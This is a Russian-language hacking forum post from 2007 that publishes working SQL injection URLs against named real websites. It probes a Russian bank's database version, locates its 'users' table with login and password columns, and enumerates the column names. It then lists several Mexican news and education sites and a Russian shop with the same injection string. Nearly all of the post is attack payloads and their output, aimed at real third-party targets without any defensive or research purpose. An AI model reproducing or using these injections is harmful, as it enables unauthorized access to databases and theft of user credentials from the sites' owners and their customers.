Показать сообщение отдельно

  #3345  
Старый 19.10.2007, 17:22
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
Smile

Код:
http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=@ @version--
Microsoft SQL Server 2000 - 8.00.2040 (Intel X86) May 13 2005 18:33:17 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
Выводим таблицу где есть колонка password
Код:
http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=(select+top+1+ table_name+from+information_schema.columns+where+column_name+like+'password')--
Нужная таблица - users =)
Узнаём имена колонок
Цитата:
http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=(select+ top+1+column_name+from+information_schema.columns+ where+table_name='users'+and+column_name+not+in+(' id','status','registrationDate','lastVisitDate','d enyAccess','hidden','days','pages','lockoutCnt','l ockoutDT','login','password','firstName','middleNa me','lastName','shortName','longName','ip','email' ,'phone','fax',%20'address'%20,'organization','dep artment','position'%20,'certCN','certData','certSt ate','denyDate','denyReason','description'))--
На этом, пожалуй, остановимся =))
Код:
http://www.elporvenir. com.mx/avisos_cat.asp? cat_id=1+or+1=@@version--
Код:
http://www.cap.edu.mx /Content.aspx? ID=1+or+1=@@version--
Код:
http://www.correo-gto.com.mx /notas.asp?id= 1+or+1=@@version--
Код:
http://www.tashop.ru /order/frame.asp?id= 1+or+1=@@version--

Последний раз редактировалось Nea7; 19.10.2007 в 17:25..